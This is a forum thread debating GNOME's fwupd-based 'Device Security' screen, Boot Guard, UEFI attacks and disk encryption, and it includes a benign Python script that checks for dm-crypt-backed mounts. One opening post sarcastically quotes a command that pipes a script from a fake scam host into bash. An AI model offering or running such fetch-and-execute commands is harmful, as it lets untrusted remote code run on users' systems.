Ubuntu Isn't Yet Onboard With GNOME's "Device Security" Screen
Originally posted by Shiba:
"You want me to run curl -s http://definitely.not/a_scam.sh | bash? GNOME says my system is secure, so it must be OK"
- Probably you
Originally posted by binarybanana:
Exactly. This so-called security is a newspeak-like perversion of language. The more "secure" the system, the less able you are to actually make sure it is. Especially on a laptop it's infuriating when you can't even swap out the WiFi card. Because... that would prevent ME/firmware from snooping on your traffic. For your safety, of course.
Originally posted by kpedersen:
You probably aren't wrong, but I am going to assume no-one in these forums is ever going to experience a UEFI attack. There are far more security issues around that need fixing first than this almost theoretical nonsense.
Kind of verging on the really dumb stuff like Microsoft Secure Boot when the rest of the OS is just a security mess. Most people (including Linux users) don't even use encrypted disks, rendering almost all of this stuff redundant. An attacker can just remove the disk and do what they want with it.

This type of foot-dragging is holding the entire Linux ecosystem back for no good reason.
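The quoted post's point that an unencrypted disk makes the firmware-level checks largely moot is easy to verify on a running machine: if "/" is not stacked on a dm-crypt (LUKS) mapping, anyone who pulls the drive reads it directly. The script below is an added example written for this thread, not code from fwupd, GNOME or any poster. It walks the device tree that util-linux's `lsblk -J -o NAME,TYPE,MOUNTPOINT` prints and reports, per mounted filesystem, whether a `crypt` node sits anywhere above it; the two trees embedded in it are constructed sample data shaped like that output, and the live query falls back to the plain sample when `lsblk` is absent.

```python
"""Report which mounted filesystems are backed by a dm-crypt (LUKS) layer.

Added example for the thread above, not project code. Parses the JSON tree
that `lsblk -J -o NAME,TYPE,MOUNTPOINT` (util-linux) emits; the sample trees
below are constructed to look like that output.
"""
import json
import subprocess
from typing import Dict, Iterator, Tuple

# Constructed sample: root LV lives inside a LUKS container (type "crypt").
SAMPLE_LUKS = json.loads("""
{"blockdevices": [
  {"name": "nvme0n1", "type": "disk", "mountpoint": null, "children": [
    {"name": "nvme0n1p1", "type": "part", "mountpoint": "/boot/efi"},
    {"name": "nvme0n1p2", "type": "part", "mountpoint": "/boot"},
    {"name": "nvme0n1p3", "type": "part", "mountpoint": null, "children": [
      {"name": "cryptroot", "type": "crypt", "mountpoint": null, "children": [
        {"name": "vg-root", "type": "lvm", "mountpoint": "/"},
        {"name": "vg-swap", "type": "lvm", "mountpoint": "[SWAP]"}]}]}]}]}
""")

# Constructed sample: plain partitions, nothing encrypted.
SAMPLE_PLAIN = json.loads("""
{"blockdevices": [
  {"name": "sda", "type": "disk", "mountpoint": null, "children": [
    {"name": "sda1", "type": "part", "mountpoint": "/boot/efi"},
    {"name": "sda2", "type": "part", "mountpoint": "/"}]}]}
""")


def _walk(node: dict, under_crypt: bool) -> Iterator[Tuple[str, bool]]:
    """Yield (mountpoint, encrypted) for every mounted node. `encrypted` is
    True when this node or any ancestor is a dm-crypt mapping."""
    under_crypt = under_crypt or node.get("type") == "crypt"
    mountpoint = node.get("mountpoint")
    if mountpoint:
        yield mountpoint, under_crypt
    for child in node.get("children", []):
        yield from _walk(child, under_crypt)


def encrypted_mounts(tree: dict) -> Dict[str, bool]:
    """Map each mountpoint to whether its block device is stacked on dm-crypt."""
    result: Dict[str, bool] = {}
    for dev in tree.get("blockdevices", []):
        for mountpoint, enc in _walk(dev, False):
            result[mountpoint] = enc
    return result


def root_is_encrypted(tree: dict) -> bool:
    """True only if '/' is present and backed by a dm-crypt layer."""
    return encrypted_mounts(tree).get("/", False)


def live_tree() -> dict:
    """Query the running system; fall back to the constructed plain sample
    when lsblk is unavailable so the script still runs stand-alone."""
    try:
        out = subprocess.run(["lsblk", "-J", "-o", "NAME,TYPE,MOUNTPOINT"],
                             capture_output=True, text=True, check=True).stdout
        return json.loads(out)
    except (FileNotFoundError, subprocess.CalledProcessError, json.JSONDecodeError):
        return SAMPLE_PLAIN


if __name__ == "__main__":
    tree = live_tree()
    for mountpoint, enc in sorted(encrypted_mounts(tree).items()):
        # Anything reported PLAINTEXT is readable by whoever removes the drive.
        print(f"{mountpoint:<12} {'dm-crypt' if enc else 'PLAINTEXT'}")
    print("root encrypted:", root_is_encrypted(tree))
```

The check only recognises block-level encryption that shows up as a `crypt` node in the device tree; filesystem-native schemes (fscrypt, ZFS or Btrfs-level encryption) are not detected and would be reported as PLAINTEXT. Note also that `/boot` and the EFI partition are expected to be unencrypted on most setups, which is exactly the layer the firmware-level checks discussed in this thread are meant to protect.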
Originally posted by ssokolow:
Reminds me of how, last I heard, Windows 11 only allows self-built PCs to disable Virtualization Based Security, meaning pre-built PCs are at a permanent disadvantage if your goal is maximum performance.

2. Any Windows 11 pre-built PC does have an MBEC-capable CPU, so you have no performance loss; that's what the shiny stickers are for: OEM -> Microsoft -> Windows 11 sticker, yay.
Originally posted by kpedersen:
Can you find a more reliable / non-biased source?
Well, it is indeed unhelpful and confusing. What do those levels even mean? Secure from what exactly? Did they also publish the threat model they evaluate device "security" against? I would say that's not a Device Security feature, that's Device Security theater.
Originally posted by ssokolow:
Ahh, yes. Let's encourage people to see it as virtuous that your OEM-assembled system (Boot Guard wasn't even available for self-assembled PCs last I checked) has the "feature" that burns extra signature checks into one-time programmable memory in the PCH, permanently ruling out the possibility of BIOS modding and/or Coreboot-y things.
Reminds me of how, last I heard, Windows 11 only allows self-built PCs to disable Virtualization Based Security, meaning pre-built PCs are at a permanent disadvantage if your goal is maximum performance.
Originally posted by jntesteves:
Fwupd's HSI is not a general security score; it only refers to the platform, as in the CPU, motherboard and BIOS. It's of course your responsibility to take steps to be secure at other levels. The example you mention is hence irrelevant in this discussion. Note that other obvious security concerns, like SELinux status or root login, are omitted. Fwupd only concerns itself with firmware.
Originally posted by hughsie:
Can you find a more reliable / non-biased source? I'm not being confrontational, I personally can't. Best I can find is:
https://link.springer.com/article/10...46411619080224
And much of this just falls back on closed hardware making it difficult to protect any further up the stack.
Last edited by kpedersen; 28 August 2022, 06:08 PM.
Originally posted by hughsie:
We have all this already in https://github.com/fwupd/fwupd/blob/...-common.c#L369 -- but Ubuntu will need to update to the latest fwupd release in time for the actual GNOME release.

It seems like the full detailed documentation of these is here: https://github.com/fwupd/fwupd/blob/...i.Tpm.EmptyPcr. Maybe there's a way for the UI to link there?
P.S. Why is suspend-to-idle supposedly any better than proper S3 suspend-to-RAM? Either way, if the contents of DRAM are unencrypted, an attacker who can remove DIMMs will probably be able to read a lot of your RAM.
Last edited by yump; 28 August 2022, 05:51 PM.
Originally posted by kpedersen:
no-one in these forums is ever going to experience a UEFI attack.